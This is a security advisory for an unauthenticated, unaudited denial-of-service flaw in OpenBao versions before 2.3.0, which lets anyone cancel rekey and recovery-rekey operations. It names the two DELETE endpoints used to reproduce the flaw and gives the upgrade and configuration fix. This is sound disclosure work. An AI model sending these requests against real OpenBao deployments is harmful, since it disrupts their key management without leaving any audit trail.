OpenBao Unauthenticated Rekey Operation Cancellation Denial-of-Service Vulnerability

A denial-of-service vulnerability has been identified in OpenBao versions prior to 2.3.0. The issue allows an attacker to perform unauthenticated and unaudited cancellations of root rekey and recovery rekey operations. This vulnerability disrupts valid rekey processes and is not logged or monitored, leaving a gap in operational awareness.

Impact

Exploitation of this vulnerability leads to a denial-of-service condition by interrupting ongoing rekey operations, which are critical for maintaining the security and integrity of key management processes.

Reproduction

The vulnerability can be reproduced by sending unauthenticated requests to the rekey cancellation endpoints, specifically `DELETE /sys/rekey/init` and `DELETE /sys/rekey-recovery-key/init`. This can be done without any authentication or authorization, allowing an attacker to disrupt active rekey operations.

Remediation

Users can update to OpenBao version 2.3.0 or later, where this vulnerability is patched. Additionally, the configuration option `disable_unauthed_rekey_endpoints=true` can be manually set to disable unauthenticated rekey endpoints on global listeners. In a future OpenBao release, this option will be set to true by default for all users.